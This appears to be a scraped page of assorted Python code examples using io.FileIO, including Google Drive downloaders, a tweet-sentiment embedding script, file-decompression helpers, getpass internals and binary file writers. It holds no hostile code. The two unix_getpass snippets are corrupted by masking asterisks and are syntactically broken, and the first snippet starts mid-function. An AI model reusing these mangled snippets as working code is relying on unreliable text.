            tweet_tokeenized.append(clean_tweet[0])
            tweet_df.loc[index] = [
                status.user.screen_name, status.created_at, status.full_text,
                clean_tweet[1], clean_tweet[0]
            ]
            index += 1
            if index == tweet_num:
                break

        tweet_df['target'] = None

        loaded_model = pickle.load(open(predict_model, 'rb'))

        for index in range(len(tweet_df)):
            if tweet_df['text'][index] is np.nan:
                pass
            else:
                if int(loaded_model.predict(list([tweet_df['text'][index]
                                                  ]))) == 1:
                    tweet_df['target'][index] = 'Postive'
                else:
                    tweet_df['target'][index] = 'Negative'

        positive_tweet_df = tweet_df.loc[tweet_df['target'] == 'Postive']
        for row in positive_tweet_df.index:  # range(len(positive_tweet_df)):
            positive_tokens += positive_tweet_df['tokens'][row]

        tweet_tokens_set = set(tweet_tokens)
        for token in tweet_tokens_set:
            token_all_counter = tweet_tokens.count(token)
            token_pos_counter = positive_tokens.count(token)
            tokens_positiveti_dict[token] = int(token_pos_counter /
                                                token_all_counter * 100)

        tweet_df.drop(['Screen_Name', 'Time_Stamp', 'text', 'tokens'],
                      axis=1,
                      inplace=True)
        print(tweet_df)
        return tokens_positiveti_dict, tweet_tokens, tweet_tokeenized, tweet_df

    pos_tokens_dict, donalds_tokens_list, donalds_tokenized_tweets, donalds_df = \
        get_api_clean_tweets_df(user_screen_name, tweets_count, predict_model)

    cores = multiprocessing.cpu_count()

    user_model = Word2Vec(
        donalds_tokenized_tweets,
        min_count=1,
        size=200,
        workers=cores,
    )
    user_model.save("user_model")
    model = gensim.models.keyedvectors.KeyedVectors.load("user_model")

    max_size = len(model.wv.vocab) - 1
    w2v = np.zeros((max_size, model.layer1_size))

    with open("test/metadata.tsv", 'w+') as file_metadata:
        meta_word = ('word' + '\t' + 'Sentiment')
        file_metadata.write(meta_word + '\n')

    with open('tensors.tsv', 'w+') as tensors:
        with open("test/metadata.tsv", 'a') as file_metadata:
            for i, word in enumerate(model.wv.index2word[:max_size]):
                w2v[i] = model.wv[word]
                if pos_tokens_dict[word] < 50:
                    meta_word = word + '(' + str(
                        pos_tokens_dict[word]) + ')' + '\t' + str(0)
                    file_metadata.write(meta_word + '\n')
                else:
                    meta_word = word + '(' + str(
                        pos_tokens_dict[word]) + ')' + '\t' + str(100)
                    file_metadata.write(meta_word + '\n')
                vector_row = '\t'.join(map(str, model[word]))
                tensors.write(vector_row + '\n')

    sess = tf.InteractiveSession()

    with tf.device("/cpu:0"):
        embedding = tf.Variable(w2v, trainable=False, name='embedding')
        print(embedding)

    tf.global_variables_initializer().run()

    saver = tf.train.Saver()

    writer = tf.summary.FileWriter(path, sess.graph)

    config = projector.ProjectorConfig()
    embed = config.embeddings.add()
    embed.tensor_name = 'embedding'
    embed.metadata_path = 'metadata.tsv'

    projector.visualize_embeddings(writer, config)

    saver.save(sess, path + '/model.ckpt', global_step=max_size)
Ejemplo n.º 15
0
def get_readable_fileobj(name_or_obj,
                         encoding=None,
                         cache=False,
                         show_progress=True,
                         remote_timeout=None):
    """
    Given a filename or a readable file-like object, return a context
    manager that yields a readable file-like object.

    This supports passing filenames, URLs, and readable file-like
    objects, any of which can be compressed in gzip or bzip2.

    Notes
    -----

    This function is a context manager, and should be used for example
    as::

        with get_readable_fileobj('file.dat') as f:
            contents = f.read()

    Parameters
    ----------
    name_or_obj : str or file-like object
        The filename of the file to access (if given as a string), or
        the file-like object to access.

        If a file-like object, it must be opened in binary mode.

    encoding : str, optional
        When `None` (default), returns a file-like object with a
        `read` method that on Python 2.x returns `bytes` objects and
        on Python 3.x returns `str` (`unicode`) objects, using
        `locale.getpreferredencoding()` as an encoding.  This matches
        the default behavior of the built-in `open` when no `mode`
        argument is provided.

        When `'binary'`, returns a file-like object where its `read`
        method returns `bytes` objects.

        When another string, it is the name of an encoding, and the
        file-like object's `read` method will return `str` (`unicode`)
        objects, decoded from binary using the given encoding.

    cache : bool, optional
        Whether to cache the contents of remote URLs.

    show_progress : bool, optional
        Whether to display a progress bar if the file is downloaded
        from a remote server.  Default is `True`.

    remote_timeout : float
        Timeout for remote requests in seconds (default is the configurable
        REMOTE_TIMEOUT, which is 3s by default)

    Returns
    -------
    file : readable file-like object
    """

    # close_fds is a list of file handles created by this function
    # that need to be closed.  We don't want to always just close the
    # returned file handle, because it may simply be the file handle
    # passed in.  In that case it is not the responsibility of this
    # function to close it: doing so could result in a "double close"
    # and an "invalid file descriptor" exception.
    close_fds = []
    delete_fds = []

    if remote_timeout is None:
        # use configfile default
        remote_timeout = REMOTE_TIMEOUT()

    # Get a file object to the content
    if isinstance(name_or_obj, six.string_types):
        if _is_url(name_or_obj):
            name_or_obj = download_file(name_or_obj,
                                        cache=cache,
                                        show_progress=show_progress,
                                        timeout=remote_timeout)
        if PY3K:
            fileobj = io.FileIO(name_or_obj, 'r')
        else:
            fileobj = open(name_or_obj, 'rb')
        close_fds.append(fileobj)
    else:
        fileobj = name_or_obj

    # Check if the file object supports random access, and if not,
    # then wrap it in a BytesIO buffer.  It would be nicer to use a
    # BufferedReader to avoid reading loading the whole file first,
    # but that is not compatible with streams or urllib2.urlopen
    # objects on Python 2.x.
    if not hasattr(fileobj, 'seek'):
        fileobj = io.BytesIO(fileobj.read())

    # Now read enough bytes to look at signature
    signature = fileobj.read(4)
    fileobj.seek(0)

    if signature[:3] == b'\x1f\x8b\x08':  # gzip
        import struct
        try:
            from .compat import gzip
            fileobj_new = gzip.GzipFile(fileobj=fileobj, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really gzip
        except (IOError, EOFError):  # invalid gzip file
            fileobj.seek(0)
            fileobj_new.close()
        except struct.error:  # invalid gzip file on Python 3
            fileobj.seek(0)
            fileobj_new.close()
        else:
            fileobj_new.seek(0)
            fileobj = fileobj_new
    elif signature[:3] == b'BZh':  # bzip2
        try:
            # bz2.BZ2File does not support file objects, only filenames, so we
            # need to write the data to a temporary file
            tmp = NamedTemporaryFile("wb", delete=False)
            tmp.write(fileobj.read())
            tmp.close()
            delete_fds.append(tmp)
            import bz2
            fileobj_new = bz2.BZ2File(tmp.name, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really bzip2
        except IOError:  # invalid bzip2 file
            fileobj.seek(0)
            fileobj_new.close()
        else:
            fileobj_new.seek(0)
            close_fds.append(fileobj_new)
            fileobj = fileobj_new

    # By this point, we have a file, io.FileIO, gzip.GzipFile, or
    # bz2.BZ2File instance opened in binary mode (that is, read
    # returns bytes).  Now we need to, if requested, wrap it in a
    # io.TextIOWrapper so read will return unicode based on the
    # encoding parameter.

    if PY3K:
        needs_textio_wrapper = encoding != 'binary'
    else:
        needs_textio_wrapper = encoding != 'binary' and encoding is not None

    if needs_textio_wrapper:
        # A bz2.BZ2File can not be wrapped by a TextIOWrapper,
        # so we decompress it to a temporary file and then
        # return a handle to that.
        import bz2
        if isinstance(fileobj, bz2.BZ2File):
            tmp = NamedTemporaryFile("wb", delete=False)
            data = fileobj.read()
            tmp.write(data)
            tmp.close()
            delete_fds.append(tmp)
            if PY3K:
                fileobj = io.FileIO(tmp.name, 'r')
            else:
                fileobj = open(tmp.name, 'rb')
            close_fds.append(fileobj)

        # On Python 2.x, we need to first wrap the regular `file`
        # instance in a `io.FileIO` object before it can be
        # wrapped in a `TextIOWrapper`.  We don't just create an
        # `io.FileIO` object in the first place, because we can't
        # get a raw file descriptor out of it on Python 2.x, which
        # is required for the XML iterparser.
        if not PY3K and isinstance(fileobj, file):
            fileobj = io.FileIO(fileobj.fileno())

        fileobj = io.BufferedReader(fileobj)
        fileobj = io.TextIOWrapper(fileobj, encoding=encoding)

        # Ensure that file is at the start - io.FileIO will for
        # example not always be at the start:
        # >>> import io
        # >>> f = open('test.fits', 'rb')
        # >>> f.read(4)
        # 'SIMP'
        # >>> f.seek(0)
        # >>> fileobj = io.FileIO(f.fileno())
        # >>> fileobj.tell()
        # 4096L

        fileobj.seek(0)

    try:
        yield fileobj
    finally:
        for fd in close_fds:
            fd.close()
        for fd in delete_fds:
            os.remove(fd.name)
Ejemplo n.º 16
0
    def download_file(self, file_id, download_directory_path, username):
        """
        Downloads the file for file_id to the given download_path.

        :param file_id:
        :param download_directory_path:
        :return: the full path to the downloaded file
        """
        googledrive_file = self.googledrive_api.files().get(
            fileId=file_id, fields="name, mimeType").execute()

        # convert utf-8 chars
        safe_filename = googledrive_file['name'].encode(
            sys.getfilesystemencoding(), 'ignore')
        file_download_path = os.path.join(download_directory_path,
                                          safe_filename)
        logger.debug('Download file %s <= googledrive://file/%s',
                     file_download_path, file_id)

        if 'vnd.google-apps' in googledrive_file['mimeType']:
            # if googledrive_file['mimeType'] == 'application/vnd.google-apps.spreadsheet':
            #     mimeType = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
            # elif googledrive_file['mimeType'] == 'application/vnd.google-apps.document':
            #     mimeType = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
            # elif googledrive_file['mimeType'] == 'application/vnd.google-apps.presentation':
            #     mimeType = 'application/vnd.openxmlformats-officedocument.presentationml.presentation'
            # else:
            n = Notification(
                event_type='data',
                status=Notification.ERROR,
                operation='googledrive_download_error',
                message=
                'Copying Google-type files is currently unsupported. Export the file to'
                ' a standard format and try again.',
                user=username,
                extra={
                    'path':
                    "'{}' of type {}".format(googledrive_file['name'],
                                             googledrive_file['mimeType'])
                })
            n.save()
            return None

        request = self.googledrive_api.files().get_media(fileId=file_id)

        # Incremental Partial Download
        fh = io.FileIO(file_download_path, 'wb')
        downloader = MediaIoBaseDownload(fh, request)
        done = False
        backoff_attempts = 0
        while done is False:
            try:
                status, done = downloader.next_chunk()
                # logger.debug('status: {} percent'.format(status.progress()))
            except HttpError as e:
                # Incremental backoff for exceeding google api rate limit
                if "Rate Limit Exceeded" in str(e):
                    logger.debug('RATE LIMIT EXCEEDED')
                    backoff_attempts += 1
                    time.sleep(backoff_attempts)
                    if backoff_attempts > 10:
                        n = Notification(
                            event_type='data',
                            status=Notification.ERROR,
                            operation='googledrive_download_error',
                            message=
                            'Rate Limit Exceeded. Try again after a few minutes for this file.',
                            user=username,
                            extra={
                                'path': "{}".format(googledrive_file['name'])
                            })
                        n.save()
                        return None
                elif "Only files with binary content can be downloaded" in str(
                        e):
                    n = Notification(
                        event_type='data',
                        status=Notification.ERROR,
                        operation='googledrive_download_error',
                        message=
                        'Only files with binary content can be downloaded. Convert the file to'
                        ' a standard format and try again.',
                        user=username,
                        extra={
                            'path':
                            "'{}' of type {}".format(
                                googledrive_file['name'],
                                googledrive_file['mimeType'])
                        })
                    n.save()
                    return None
                else:
                    raise

        fh.close()

        return file_download_path
Ejemplo n.º 17
0
def download(service, file, destination, skip=False, noiter=False):
    # file is a dictionary with file id as well as name
    if skip and os.path.exists(os.path.join(destination, file['name'])):
        return -1
    mimeType = file['mimeType']
    if "application/vnd.google-apps" in mimeType:
        if "form" in mimeType: return -1
        elif "document" in mimeType:
            dlfile = service.files().export_media(
                fileId=file['id'],
                mimeType=
                'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
            )
        elif "spreadsheet" in mimeType:
            dlfile = service.files().export_media(
                fileId=file['id'],
                mimeType=
                'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
            )
        elif "presentation" in mimeType:
            dlfile = service.files().export_media(
                fileId=file['id'],
                mimeType=
                'application/vnd.openxmlformats-officedocument.presentationml.presentation'
            )
        else:
            dlfile = service.files().export_media(fileId=file['id'],
                                                  mimeType='application/pdf')
    else:
        dlfile = service.files().get_media(fileId=file['id'],
                                           supportsAllDrives=True,
                                           acknowledgeAbuse=True)
    rand_id = str(uuid.uuid4())
    os.makedirs('buffer', exist_ok=True)
    fh = io.FileIO(os.path.join('buffer', rand_id), 'wb')
    downloader = MediaIoBaseDownload(fh, dlfile, chunksize=CHUNK_SIZE)
    if noiter:
        print(f"{Fore.GREEN}Downloading{Style.RESET_ALL} {file['name']} ...")
    done = False
    rate_limit_count = 0
    while done is False and rate_limit_count < 20:
        try:
            status, done = downloader.next_chunk()
        except Exception as ex:
            DEBUG_STATEMENTS.append(
                f'File Name: {file["name"]}, File ID: {file["id"]}, Exception: {ex}'
            )
            rate_limit_count += 1
    fh.close()
    if noiter and rate_limit_count == 20:
        print(f"{Fore.RED}Error      {Style.RESET_ALL} {file['name']} ...")
    os.makedirs(destination, exist_ok=True)
    while True:
        try:
            shutil.move(os.path.join('buffer', rand_id),
                        os.path.join(destination, file['name']))
            break
        except PermissionError:
            # wait out the file write before attempting to move
            pass
    return rate_limit_count
Ejemplo n.º 18
0
print("-----------------------------------------------------")
for filepath in files:
    data = open(filepath, "r", encoding="utf-8")
    s = s + 1
    start = True
    Fussnoten = False

    ## process lines
    for line in data:
        ## get title
        done = False
        if filepath in firstsite and start == True:
            if not os.path.exists("out/" + sys.argv[1]):
                os.makedirs("out/" + sys.argv[1])

            with io.FileIO("./out/" + sys.argv[1] + "/" + titleN + ".txt",
                           "w") as file:
                file.write(article.encode("utf-8"))

            if not os.path.exists("out_notes/" + sys.argv[1]):
                os.makedirs("out_notes/" + sys.argv[1])

            with io.FileIO(
                    "./out_notes/" + sys.argv[1] + "/" + titleN + ".txt",
                    "w") as file:
                file.write(notes.encode("utf-8"))

            titleN = title[a]
            titleN = titleN[:-1]
            article = ""
            notes = ""
            article += title[a]
Ejemplo n.º 19
0
from google.colab import auth
auth.authenticate_user()
drive_service = build('drive', 'v3')

#File Download

!rm -f *.zip *.csv

#!kaggle competitions download -c jigsaw-toxic-comment-classification-challenge
#train.csv download
results = drive_service.files().list(q="name = 'train.csv.zip'", fields="files(id)").execute()
kaggle_api_key = results.get('files', [])
filename = "/content/train.csv.zip"
os.makedirs(os.path.dirname(filename), exist_ok=True)
request = drive_service.files().get_media(fileId=kaggle_api_key[0]['id'])
fh = io.FileIO(filename, 'wb')
downloader = MediaIoBaseDownload(fh, request)
done = False
while done is False:
    status, done = downloader.next_chunk()
    print("train.csv.zip - Download %d%%." % int(status.progress() * 100))
os.chmod(filename, 600)

#test.csv download
results = drive_service.files().list(q="name = 'test.csv.zip'", fields="files(id)").execute()
kaggle_api_key = results.get('files', [])
filename = "/content/test.csv.zip"
os.makedirs(os.path.dirname(filename), exist_ok=True)
request = drive_service.files().get_media(fileId=kaggle_api_key[0]['id'])
fh = io.FileIO(filename, 'wb')
downloader = MediaIoBaseDownload(fh, request)
Ejemplo n.º 20
0
 def open_read(self, path, mode="r"):
     return FileWrapper(io.BufferedReader(io.FileIO(path, mode)))
Ejemplo n.º 21
0
async def download_gdrive(gdrive, service, uri):
    reply = ""
    global is_cancelled
    if not isdir(TEMP_DOWNLOAD_DIRECTORY):
        os.mkdir(TEMP_DOWNLOAD_DIRECTORY)
    if "&export=download" in uri:
        uri = uri.split("&export=download")[0]
    elif "file/d/" in uri and "/view" in uri:
        uri = uri.split("?usp=drivesdk")[0]
    try:
        file_Id = uri.split("uc?id=")[1]
    except IndexError:
        try:
            file_Id = uri.split("open?id=")[1]
        except IndexError:
            if "/view" in uri:
                file_Id = uri.split("/")[-2]
            else:
                try:
                    file_Id = uri.split("uc?export=download&confirm=")[1].split("id=")[
                        1
                    ]
                except IndexError:
                    file_Id = uri
    try:
        file = await get_information(service, file_Id)
    except HttpError as e:
        if "404" in str(e):
            drive = "https://drive.google.com"
            url = f"{drive}/uc?export=download&id={file_Id}"

            session = requests.session()
            download = session.get(url, stream=True)

            try:
                download.headers["Content-Disposition"]
            except KeyError:
                page = BeautifulSoup(download.content, "lxml")
                try:
                    export = drive + page.find("a", {"id": "uc-download-link"}).get(
                        "href"
                    )
                except AttributeError:
                    try:
                        error = (
                            page.find("p", {"class": "uc-error-caption"}).text
                            + "\n"
                            + page.find("p", {"class": "uc-error-subcaption"}).text
                        )
                    except Exception:
                        reply += (
                            "`[FILE - ERROR]`\n\n"
                            "`Status` : **BAD** - failed to download.\n"
                            "`Reason` : uncaught err."
                        )
                    else:
                        reply += (
                            "`[FILE - ERROR]`\n\n"
                            "`Status` : **BAD** - failed to download.\n"
                            f"`Reason` : {error}"
                        )
                    return reply
                download = session.get(export, stream=True)
                file_size = human_to_bytes(
                    page.find("span", {"class": "uc-name-size"})
                    .text.split()[-1]
                    .strip("()")
                )
            else:
                file_size = int(download.headers["Content-Length"])

            file_name = re.search(
                'filename="(.*)"', download.headers["Content-Disposition"]
            ).group(1)
            file_path = TEMP_DOWNLOAD_DIRECTORY + file_name
            with io.FileIO(file_path, "wb") as files:
                CHUNK_SIZE = None
                current_time = time.time()
                display_message = None
                first = True
                is_cancelled = False
                for chunk in download.iter_content(CHUNK_SIZE):
                    if is_cancelled:
                        raise CancelProcess

                    if not chunk:
                        break

                    diff = time.time() - current_time
                    if first:
                        downloaded = len(chunk)
                        first = False
                    else:
                        downloaded += len(chunk)
                    percentage = downloaded / file_size * 100
                    speed = round(downloaded / diff, 2)
                    eta = round((file_size - downloaded) / speed)
                    prog_str = "[{0}{1}] `{2}%`".format(
                        "".join("█" for i in range(math.floor(percentage / 10))),
                        "".join("░" for i in range(10 - math.floor(percentage / 10))),
                        round(percentage, 2),
                    )
                    current_message = (
                        f"{file_name} - Downloading\n"
                        f"{prog_str}\n"
                        f"`Size:` {humanbytes(downloaded)} of {humanbytes(file_size)}"
                        f"`Speed:` {humanbytes(speed)}`\n"
                        f"`ETA:` {time_formatter(eta)}"
                    )
                    if (
                        round(diff % 15.00) == 0
                        and (display_message != current_message)
                        or (downloaded == file_size)
                    ):
                        await gdrive.edit(current_message)
                        display_message = current_message
                    files.write(chunk)
    else:
        file_name = file.get("name")
        mimeType = file.get("mimeType")
        if mimeType == "application/vnd.google-apps.folder":
            await gdrive.edit("`Aborting, folder download not support...`")
            return False
        file_path = TEMP_DOWNLOAD_DIRECTORY + file_name
        request = service.files().get_media(fileId=file_Id, supportsAllDrives=True)
        with io.FileIO(file_path, "wb") as df:
            downloader = MediaIoBaseDownload(df, request)
            complete = False
            is_cancelled = False
            current_time = time.time()
            display_message = None
            while not complete:
                if is_cancelled:
                    raise CancelProcess

                status, complete = downloader.next_chunk()
                if status:
                    file_size = status.total_size
                    diff = time.time() - current_time
                    downloaded = status.resumable_progress
                    percentage = downloaded / file_size * 100
                    speed = round(downloaded / diff, 2)
                    eta = round((file_size - downloaded) / speed)
                    prog_str = " [{0}{1}] `{2}%`".format(
                        "".join("█" for i in range(math.floor(percentage / 10))),
                        "".join("░" for i in range(10 - math.floor(percentage / 10))),
                        round(percentage, 2),
                    )
                    current_message = (
                        f"{file_name} - Downloading\n"
                        f"{prog_str}\n"
                        f"`Size:` {humanbytes(downloaded)} of {humanbytes(file_size)}"
                        f"`Speed:` {humanbytes(speed)}`\n"
                        f"`ETA:` {time_formatter(eta)}"
                    )
                    if (
                        round(diff % 15.00) == 0
                        and (display_message != current_message)
                        or (downloaded == file_size)
                    ):
                        await gdrive.edit(current_message)
                        display_message = current_message
    await gdrive.edit(
        "`[FILE - DOWNLOAD]`\n\n"
        f"`Name   :` `{file_name}`\n"
        f"`Size   :` `{humanbytes(file_size)}`\n"
        f"`Path   :` `{file_path}`\n"
        "`Status :` **OK** - Successfully downloaded."
    )
    msg = await gdrive.respond("`Answer the question in your BOTLOG group`")
    async with gdrive.client.conversation(BOTLOG_CHATID) as conv:
        ask = await conv.send_message("`Proceed with mirroring? [y/N]`")
        try:
            r = conv.wait_event(events.NewMessage(outgoing=True, chats=BOTLOG_CHATID))
            r = await r
        except Exception:
            ans = "N"
        else:
            ans = r.message.message.strip()
            await gdrive.client.delete_messages(BOTLOG_CHATID, r.id)
        await gdrive.client.delete_messages(gdrive.chat_id, msg.id)
        await gdrive.client.delete_messages(BOTLOG_CHATID, ask.id)
    if ans.capitalize() == "N":
        return reply
    elif ans.capitalize() == "Y":
        try:
            result = await upload(gdrive, service, file_path, file_name, mimeType)
        except CancelProcess:
            reply += (
                "`[FILE - CANCELLED]`\n\n"
                "`Status` : **OK** - received signal cancelled."
            )
        else:
            reply += (
                "`[FILE - UPLOADED]`\n\n"
                f"`Name   :` `{file_name}`\n"
                f"`Size   :` `{humanbytes(result[0])}`\n"
                f"`Link   :` [{file_name}]({result[1]})\n"
                "`Status :` **OK**\n\n"
            )
        return reply
    else:
        await gdrive.client.send_message(
            BOTLOG_CHATID, "`Invalid answer type [Y/N] only...`"
        )
        return reply
Ejemplo n.º 22
0
'''
Created on May 21, 2018

@author: venkateshwara.d
'''
import os
from selenium import webdriver
import io

chrome_driver_path = os.path.abspath('..') + "\\Drivers\\chromedriver.exe"

driver = webdriver.Chrome(chrome_driver_path)

driver.get('https://python.org')

html = driver.page_source

if (os.path.isfile("pageSource.txt")):

    os.remove("pageSource.txt")

with io.FileIO("pageSource.txt", "w") as file:
    file.write(html.encode("utf-8"))

driver.close()
Ejemplo n.º 23
0
def unix_getpass(prompt='Password: '******'Password: '******'/dev/tty', os.O_RDWR | os.O_NOCTTY)
            tty = io.FileIO(fd, 'w+')
            stack.enter_context(tty)
            input = io.TextIOWrapper(tty)
            stack.enter_context(input)
            if not stream:
                stream = input
        except OSError as e:
            # If that fails, see if stdin can be controlled.
            stack.close()
            try:
                fd = sys.stdin.fileno()
            except (AttributeError, ValueError):
                fd = None
                passwd = fallback_getpass(prompt, stream)
            input = sys.stdin
            if not stream:
                stream = sys.stderr

        if fd is not None:
            try:
                old = termios.tcgetattr(fd)  # a copy to save
                new = old[:]
                new[3] &= ~termios.ECHO  # 3 == 'lflags'
                tcsetattr_flags = termios.TCSAFLUSH
                if hasattr(termios, 'TCSASOFT'):
                    tcsetattr_flags |= termios.TCSASOFT
                try:
                    termios.tcsetattr(fd, tcsetattr_flags, new)
                    passwd = _raw_input(prompt, stream, input=input)
                finally:
                    termios.tcsetattr(fd, tcsetattr_flags, old)
                    stream.flush()  # issue7208
            except termios.error:
                if passwd is not None:
                    # _raw_input succeeded.  The final tcsetattr failed.  Reraise
                    # instead of leaving the terminal in an unknown state.
                    raise
                # We can't control the tty or stdin.  Give up and use normal IO.
                # fallback_getpass() raises an appropriate warning.
                if stream is not input:
                    # clean up unused file objects before blocking
                    stack.close()
                passwd = fallback_getpass(prompt, stream)

        stream.write('\n')
        return passwd
Ejemplo n.º 24
0
def _readline(fd):
    """Read one line.  May block forever if no newline is read."""
    reader = io.FileIO(fd, mode='rb', closefd=False)
    return reader.readline()
Ejemplo n.º 25
0
 def __init__(self, path):
     self._path = path
     fd = os.open(path, os.O_RDWR | os.O_DIRECT)
     self._file = io.FileIO(fd, "r+", closefd=True)
Ejemplo n.º 26
0
import pyaudio
import io, sys

p = pyaudio.PyAudio()

try:
    filename = sys.argv[1]
except:
    print(
        'ERROR: Usage - python playfile.py <filename> (e.g. python playfile.py voiceC'
    )

data_file = io.FileIO('./sound/{}.pcm'.format(filename), mode='r')

FORMAT = p.get_format_from_width(width=2)
CHANNELS = 1
RATE = 16000
CHUNK = 16000

stream = p.open(format=FORMAT,
                channels=CHANNELS,
                rate=RATE,
                output=True,
                frames_per_buffer=CHUNK)

print('playing...')

data = data_file.readall()
stream.write(data)

stream.close()
Ejemplo n.º 27
0
def unix_getpass(prompt='Password: '******'Password: '******'/dev/tty', os.O_RDWR | os.O_NOCTTY)
            tty = io.FileIO(fd, 'w+')
            stack.enter_context(tty)
            input = io.TextIOWrapper(tty)
            stack.enter_context(input)
            if not stream:
                stream = input
        except OSError as e:
            try:
                stack.close()
                try:
                    fd = sys.stdin.fileno()
                except (AttributeError, ValueError):
                    fd = None
                    passwd = fallback_getpass(prompt, stream)

                input = sys.stdin
                if not stream:
                    stream = sys.stderr
            finally:
                e = None
                del e

        if fd is not None:
            try:
                old = termios.tcgetattr(fd)
                new = old[:]
                new[3] &= ~termios.ECHO
                tcsetattr_flags = termios.TCSAFLUSH
                if hasattr(termios, 'TCSASOFT'):
                    tcsetattr_flags |= termios.TCSASOFT
                try:
                    termios.tcsetattr(fd, tcsetattr_flags, new)
                    passwd = _raw_input(prompt, stream, input=input)
                finally:
                    termios.tcsetattr(fd, tcsetattr_flags, old)
                    stream.flush()

            except termios.error:
                if passwd is not None:
                    raise
                if stream is not input:
                    stack.close()
                passwd = fallback_getpass(prompt, stream)

            stream.write('\n')
            return passwd
Ejemplo n.º 28
0
    def __init__(self, **kwargs):
        other = kwargs.get("other", None)
        if other:
            self.fromOther(other)

        else:
            self.bufferPool = kwargs.get("bufferPool", None)
            if self.bufferPool is None:
                raise ValueError(
                    "No buffer pool found when initializing a storage file")

            fileId = kwargs.get("fileId", None)
            filePath = kwargs.get("filePath", None)
            mode = kwargs.get("mode", None)
            existing = os.path.exists(filePath)

            if fileId and filePath:
                initHeader = False
                initFreePages = False

                if not existing and mode.lower() == "create":
                    ioMode = "w+b"
                    pageSize = kwargs.get("pageSize", io.DEFAULT_BUFFER_SIZE)
                    pageClass = kwargs.get("pageClass",
                                           StorageFile.defaultPageClass)
                    schema = kwargs.get("schema", None)
                    if pageSize and pageClass and schema:
                        self.header = FileHeader(pageSize=pageSize,
                                                 pageClass=pageClass,
                                                 schema=schema)
                        initHeader = True
                        initFreePages = False
                    else:
                        raise ValueError(
                            "No page size, class or schema specified when creating a new storage file"
                        )

                elif existing and mode.lower() in ["update", "truncate"]:
                    ioMode = "r+b" if mode.lower() == "update" else "w+b"
                    f = io.BufferedReader(io.FileIO(filePath))
                    self.header = FileHeader.fromFile(f)
                    pageSize = self.pageSize()
                    initFreePages = True
                    f.close()

                else:
                    raise ValueError(
                        "Incompatible storage file mode and on-disk file status"
                    )

                if self.header:
                    self.fileId = fileId
                    self.path = filePath
                    self.file = io.BufferedRandom(io.FileIO(self.path, ioMode),
                                                  buffer_size=pageSize)
                    self.binrepr = Struct("H" + str(FileId.binrepr.size) +
                                          "s" + str(len(self.path)) + "s")
                    self.freePages = set()

                    page = self.pageClass()(pageId=self.pageId(0),
                                            buffer=bytes(self.pageSize()),
                                            schema=self.schema())
                    self.pageHdrSize = page.header.headerSize()

                    if initFreePages:
                        self.initializeFreePages()

                    if initHeader:
                        self.file.seek(0)
                        self.header.toFile(self.file)
                        self.file.flush()

                else:
                    raise ValueError(
                        "No valid header available for storage file")
            else:
                raise ValueError(
                    "No file id or path specified in storage file constructor")
Ejemplo n.º 29
0
for name in shaders:
    if "_f" in name:
        profile = "sce_fp_psp2"
    else:
        profile = "sce_vp_psp2"
    cmd = "psp2cgc -profile %s ..\external\src\inline_gles2\shaders\%s.cg -o %s.bin" % (
        profile, name, name)
    print(cmd)
    os.system(cmd)

out = open("../external/src/cg_shaders.h", "wb")
out.write("// shaders compiled by build_shaders.py\n\n")

for name in shaders:
    f = io.FileIO("%s.bin" % (name), "rb")
    z = f.read()
    out.write("static const uint8_t cg_shaderbin_%s[] = {" % (name))
    for byte in z:
        out.write("0x%02x," % (ord(byte)))
    out.write("};\n")

out.write("\n")
"""

out.write("static const char * const cg_shader_names[] = {")
for name in shaders:
  out.write('"%s", ' % (name))
out.write("NULL};\n")
out.write("\n")
out.write("\n")
Ejemplo n.º 30
0
    def write(self, fileName):
        try:
            with io.FileIO(fileName, "wb") as out_file:

                formatName = "SMA"
                buffer1 = formatName.encode(encoding='UTF-8', errors='strict')
                if not buffer1:
                    buffer1 = bytes()
                out_file.write(pack('<{}s'.format(8), buffer1))

                version = 1
                out_file.write(pack('<H', version))

                buffer = self.name.encode(encoding='UTF-8', errors='strict')
                if not buffer:
                    buffer = bytes()
                out_file.write(pack('<{}s'.format(32), buffer))

                out_file.write(pack('<H', len(self.vertices)))
                for v in self.vertices:
                    out_file.write(pack('<f', v))

                out_file.write(pack('<H', len(self.normals)))
                for n in self.normals:
                    out_file.write(pack('<f', n))

                out_file.write(pack('<H', len(self.texcoords)))
                for uv in self.texcoords:
                    out_file.write(pack('<f', uv))

                self.textures.write(out_file)

                print('Saving bones')
                out_file.write(pack('<H', len(self.bones)))
                for bone in self.bones:
                    out_file.write(pack('<h', bone.parent_idx))
                    out_file.write(pack('<f', bone.rot_x))
                    out_file.write(pack('<f', bone.rot_y))
                    out_file.write(pack('<f', bone.rot_z))
                    out_file.write(pack('<f', bone.pos_x))
                    out_file.write(pack('<f', bone.pos_y))
                    out_file.write(pack('<f', bone.pos_z))
                    #bone.print()

                out_file.write(pack('<H', len(self.vertex_weights)))
                for vert_w in self.vertex_weights:
                    vert_w.write(out_file)

                out_file.write(pack('<H', len(self.animations)))
                for a in self.animations:
                    abuffer = a.name.encode(encoding='UTF-8', errors='strict')
                    if not abuffer:
                        abuffer = bytes()
                    out_file.write(pack('<{}s'.format(64), abuffer))
                    out_file.write(pack('<H', a.numKeyframes))
                    #print("Num keyframes", a.numKeyframes)
                    # print(a.name)
                    for kf in a.keyframe:
                        #print("kf index", kf.index)
                        out_file.write(pack('<H', kf.index))
                        idx = 0
                        for rot in kf.rotations:
                            out_file.write(pack('<f', kf.rotations[idx].x))
                            out_file.write(pack('<f', kf.rotations[idx].y))
                            out_file.write(pack('<f', kf.rotations[idx].z))
                            out_file.write(pack('<f', kf.positions[idx].x))
                            out_file.write(pack('<f', kf.positions[idx].y))
                            out_file.write(pack('<f', kf.positions[idx].z))
                            #print(idx)
                            idx += 1

                out_file.flush()
                out_file.close()
        finally:
            pass